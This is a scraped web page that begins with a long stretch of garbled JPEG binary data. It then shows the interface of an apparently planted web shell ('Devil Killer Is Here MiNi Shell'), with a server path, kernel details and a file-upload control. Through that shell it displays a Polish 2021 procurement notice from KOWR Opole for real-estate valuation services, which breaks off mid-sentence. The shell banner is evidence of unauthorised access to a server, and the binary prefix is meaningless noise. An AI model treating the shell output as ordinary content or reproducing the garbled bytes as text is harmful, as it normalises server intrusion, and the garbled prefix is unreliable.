JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210907/0017318701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie wycen nieruchomości <br/>- z prawem opcji – 2 zadania częściowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ TERENOWY W OPOLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-068</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.opole@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Realizacja zadań w zakresie wdrażania i stosowania instrumentów wsparcia rolnictwa, gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie wycen nieruchomości <br/>- z prawem opcji – 2 zadania częściowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24635f7c-0fcc-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00173187</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011465/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wyceny nieruchomości rolnych/nierolnych, zabudowanych i niezabudowanych oraz lokali mieszkalnych wraz z prawem opcji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się w języku polskim przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem<br/>https://kowr.eb2b.com.pl/ i pod numerem postępowania wskazanym w ust. 11.17 SWZ.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie<br/>Zakupowej oraz korzystanie z Platformy jest bezpłatne. Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej dostępny pod adresem<br/>internetowym https://platforma.eb2b.com.pl/user/terms. Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania<br/>konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie<br/>oraz uznaje go za wiążący. Wykonawca korzystając z Platformy zobowiązuje się do przestrzegania<br/>postanowień zawartych w ww. instrukcji oraz w regulaminie Platformy. Wszelkie dokumenty,<br/>oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie,<br/>według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce<br/>„Pomoc” – „Instrukcje”. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy<br/>wynosi 50 MB. Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), określa następujące niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie: 1) stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy<br/>PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden<br/>z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>3)zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer<br/>minimalnie wersja 11.0; 4) włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader.<br/>Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia w sprawie sporządzania elektronicznych<br/>dokumentów oraz komunikacji elektronicznej określa informacje na temat kodowania i czasu odbioru<br/>danych: 1) wszelkie operacje na Platformie opierają się o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy;2) plik załączony przez Wykonawcę na Platformie i<br/>zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; 3) oznaczenie<br/>czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz<br/>dokładny czas (hh:mm:ss), znajdującą się po prawej stronie dokumentu w kolumnie „Data przesłania”.<br/>Za datę przekazania na Platformę oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich<br/>wczytania do Platformy. Potwierdzeniem prawidłowo przekazanego (dokumentu elektronicznego) jest<br/>automatyczne wygenerowanie komunikatu systemowego o treści „Plik został przesłany", po każdej<br/>prawidłowo wykonanej operacji. Oferta i oświadczenia dotyczące przesłanek wykluczenia<br/>z postępowania oraz spełniania warunków udziału w postępowaniu pod rygorem nieważności muszą<br/>być<br/>sporządzone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie<br/>zamówienia/złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych<br/>osobowychAdministratorem, czylipodmiotem decydującym o celach i środkach przetwarzania<br/>Pani/Pana danych osobowych, jestKrajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z<br/>siedzibą w Warszawie (01-207) przy ul.Karolkowej 30. Z administratorem może się Pani/Pan<br/>skontaktować poprzez adres e-mail:kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny:<br/>Krajowy Ośrodek Wsparcia Rolnictwa,ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony<br/>Danych OsobowychW KOWR wyznaczonoInspektora Ochrony Danych Osobowych, z którym może się<br/>Pani/Pan skontaktować w sprawachochrony i przetwarzania swoich danych osobowych pod adresem<br/>e-mail: iodo@kowr.gov.pl lubpisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy<br/>prawne przetwarzaniadanych osobowychPani/Pana dane osobowe przetwarzane będą w celach<br/>związanym zpostępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy<br/>z dnia 11września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej<br/>PZP), wcelach związanych z realizacją obowiązków administratora jako Zamawiającego, które<br/>wynikają zobowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w<br/>celu realizacjiobowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z<br/>ustawą z dnia14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164<br/>z późn.zm.).4. Odbiorcy danych osobowychPani/Pana dane pozyskane w związku z postępowaniem<br/>oudzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom iosobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego<br/>jestjawne.Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie<br/>wszczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt<br/>1i 2 PZP.Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć<br/>dostęppodmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną,<br/>usługiinformatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych<br/>osobowychprzetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową<br/>lubkurierską.5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą<br/>przetwarzaneprzez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres<br/>przechowywaniadokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych<br/>KOWR wzakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w<br/>stosunkudo niego.Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego<br/>będzieprzechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania oudzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia<br/>postępowania,a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały<br/>czas trwania umowy. 6. Informacja o wymogu/dobrowolności podania danych osobowych Podanie<br/>Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma<br/>charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Prawa osób, których dane dotycząZgodnie z<br/>RODOprzysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo<br/>dosprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji,<br/>gdyprzetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z<br/>przepisuprawa lub w ramach sprawowania władzy publicznej; 4) prawo do ograniczenia przetwarzania<br/>danych,przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa.Jeżeli<br/>chcePani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem<br/>OchronyDanych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w<br/>pkt1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do<br/>wniesieniaskargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane<br/>podejmowanie decyzjiWoparciu o Pani/Pana dane osobowe administrator nie będzie podejmował<br/>wobec Pani/Panazautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9.<br/>Przekazywanie danychpoza Europejski Obszar GospodarczyW związku z jawnością postępowania o<br/>udzielenie zamówieniapublicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj.<br/>państwa, które nie należydo Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską,<br/>Norwegię, Liechtenstein iIslandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OP.WOP.ZP.19.2021.U</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Zadanie częściowe nr 1<br/>Wycena nieruchomości inwestycyjnych, położonych w granicach katowickiej specjalnej strefy ekonomicznej:<br/>a) w obrębie Dąbrówka Górna, gmina Krapkowice, powiat krapkowicki, woj. opolskie, przeznaczonej w miejscowym planie zagospodarowania przestrzennego pod tereny zabudowy przemysłowej i usługowej – symbol planu 2.P/U, w skład której wchodzą grunty oznaczone <br/>w ewidencji gruntów i budynków jako dz. nr 1019/1, 1019/2, 1016/3 z a.m. 1 o łącznej powierzchni 11,8146 ha, dla których w Sądzie Rejonowym w Strzelcach Opolskich prowadzona jest księga wieczysta nr OP1S/00054273/5 - w dziale III KW wpisane są ograniczone prawa rzeczowe, z których jedno o numerze wpisu 1 dotyczy przedmiotowych działek: „służebność gruntowa na działkach nr 231, 379/1, 510/1, 511, 514, 737, m.1, obrębu Gwoździce, 264/6, 265/4, 266/9 m. 1obrębu Dąbrówka Górna, nr 206/2, 207/2, 208/2, m.1, obrębu Rogów Opolski, zgodnie z treścią par. 3 umowy na rzecz każdoczesnych użytkowników wieczystych bądź właścicieli działek, objętych KW 77234 Sądu Rejonowego Wydziału Ksiąg Wieczystych w Opolu - przeniesiono do współobciążenia do KW nr 47913 odnośnie działki nr 266/9(obecnie po podziale działki nr 266/14, 266/13) dnia 29 listopada 2004 r.” – pozostałe wpisy nie dotyczą sprzedawanej działki.<br/>Przez teren działki przebiega napowietrzna linia elektroenergetyczna 110 kV oraz zlokalizowane są słupy kratownicowe, a także fragment kanalizacji deszczowej.<br/>b) w obrębie Rogów Opolski, gmina Krapkowice, powiat krapkowicki, woj. opolskie, przeznaczonej w miejscowym planie zagospodarowania przestrzennego pod tereny zabudowy przemysłowej i usługowej – symbol planu 1.P/U oraz w części pod tereny infrastruktury technicznej-elektroenergetyki – symbol planu 1.E, w skład której wchodzą grunty oznaczone w ewidencji gruntów i budynków jako dz. nr 208/52, 208/50, 208/9, 208/42, 208/11 z a.m. 1 o łącznej powierzchni 20,9723 ha, dla których w Sądzie Rejonowym w Strzelcach Opolskich prowadzona jest księga wieczysta nr OP1S/00054273/5 - w dziale III KW wpisane są ograniczone prawa rzeczowe, z których jedno o numerze wpisu 1 dotyczy dz. nr 208/52 działek: „służebność gruntowa na działkach nr 231, 379/1, 510/1, 511, 514, 737, m.1, obrębu Gwoździce, 264/6, 265/4, 266/9 m. 1obrębu Dąbrówka Górna, nr 206/2, 207/2, 208/2, m.1, obrębu Rogów Opolski, zgodnie z treścią par. 3 umowy na rzecz każdoczesnych użytkowników wieczystych bądź właścicieli działek, objętych KW 77234 Sądu Rejonowego Wydziału Ksiąg Wieczystych w Opolu - przeniesiono do współobciążenia do KW nr 47913 odnośnie działki nr 266/9(obecnie po podziale działki nr 266/14, 266/13) dnia 29 listopada 2004 r.”<br/>Przez działkę nr 208/52 przebiega napowietrzna linia elektroenergetyczna 110 kV oraz zlokalizowany jest słup kratownicowy, a na dz. nr 208/42 zlokalizowana jest sieć telekomunikacyjna.<br/>Zgodnie z pisemną informacją Burmistrza Krapkowic na części działki nr 208/50 znajduje się stanowisko archeologiczne. Obszar objęty planem znajduje się w zasięgu Głównego Zbiornika Wód Podziemnych GZWP 335 „Zbiornik Krapkowice-Strzelce Opolskie” wymagającego szczególnej ochrony zasobów wodnych <br/>i podlega ochronie w zakresie wynikającym z ustaleń planu zagospodarowania przestrzennego i przepisów odrębnych.<br/>W operacie szacunkowym należy wyodrębnić:<br/>-	wartość gruntu,<br/>- wartość drzewostanu – wg. oceny rzeczoznawcy.<br/><br/>Pozostałe informacje: <br/>•	Wyceny należy sporządzić w formie operatów szacunkowych w dwóch egzemplarzach, odrębnie dla każdego z kompleksów działek określonych w ppkt a i b. <br/>•	Zgodnie z rozporządzeniem Rady Ministrów z dnia 15 grudnia 2008r. w sprawie katowickiej specjalnej strefy ekonomicznej (Dz.U.2019.2376 j.t.) ww. działki objęte są granicami katowickiej specjalnej strefy ekonomicznej.<br/>•	Zamawiający udostępni wykonawcy:<br/>- numery ksiąg wieczystych dotyczących nieruchomości będących przedmiotem wyceny lub innych dokumentów potwierdzających prawo własności Skarbu Państwa w przypadku braku KW,<br/>- kserokopię informacji/wypisu/zaświadczenia o przeznaczeniu nieruchomości w planie zagospodarowania przestrzennego lub w studium uwarunkowań,<br/>- wykaz środków trwałych z ewidencji środków trwałych KOWR,<br/>- dane z ewidencji gruntów i budynków ze starostwa powiatowego właściwego, co do położenia nieruchomości – tj. kopię wypisu z rejestru gruntów oraz wyrysu z mapy ewidencyjnej, ewentualnie kopii mapy ewidencyjnej, kopii mapy zasadniczej, itp.,<br/>•	Wykonawca przekazuje zamawiającemu operat szacunkowy protokołem zdawczo – odbiorczym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Przedmiot zamówienia obejmuje sporządzenie wyceny zwanej dalej wycenę pierwotną oraz opcję jej ponownego wykonania. <br/>2)	Opcję ponownego wykonania wyceny należy rozumieć jako prawo Zamawiającego, ale nie obowiązek, do zlecenia ponownego wykonania wyceny/operatu szacunkowego. <br/>3)	Wykonawca wykona wycenę pierwotną oraz gwarantuje Zamawiającemu jej ponowne wykonanie. Nie skorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy do dochodzenia przez Wykonawcę jakiegokolwiek roszczenia ani odszkodowania z tego tytułu. <br/>4)	W przypadku kiedy operat szacunkowy, wg oceny Zamawiającego, będzie wymagał potwierdzenia aktualności w trybie art. 156 ust. 4 ustawy o gospodarce nieruchomościami <br/>i § 58 rozporządzenia w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego, bądź sporządzenia ponownego operatu, Wykonawca zobowiązuje się do wykonania analizy rynku nieruchomości i sprawdzenia istotnych czynników mających wpływ na określenie wartości. <br/>5)	Po przeprowadzeniu analizy o której mowa powyżej Wykonawca sporządza: <br/>a) klauzulę o aktualności, za którą przysługiwać będzie Wykonawcy wynagrodzenie brutto <br/>w wysokości 10% wynagrodzenia brutto otrzymanego za pierwotną wycenę, <br/> bądź <br/>b) nowy operat szacunkowy, z nową datą, z uwzględnieniem zmian wynikających z analizy, <br/>o której mowa w pkt 4, za który przysługiwać będzie Wykonawcy wynagrodzenie brutto <br/>w wysokości 35% wynagrodzenia brutto otrzymanego za pierwotną wycenę. <br/>6)	Realizacja zamówienia opcjonalnego odbędzie się na podstawie informacji (zlecenia) określającego w szczególności przedmiot zamówienia, termin wykonania oraz wysokość wynagrodzenia określonego na podstawie §6 ust. 2 lub 3 umowy, którą Zamawiający przekaże Wykonawcy za pośrednictwem komunikacji elektronicznej lub za pośrednictwem operatora pocztowego za zwrotnym potwierdzeniem odbioru bądź Wykonawca odbierze je osobiście <br/>u Zamawiającego. <br/>7)	Decyzja o realizacji lub rezygnacji z zamówienia opcjonalnego jest wyłącznym uprawnieniem Zamawiającego. Szczegóły dotyczące prawa opcji zawierają Projektowane postanowienia umowy stanowiące załącznik nr 3 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub 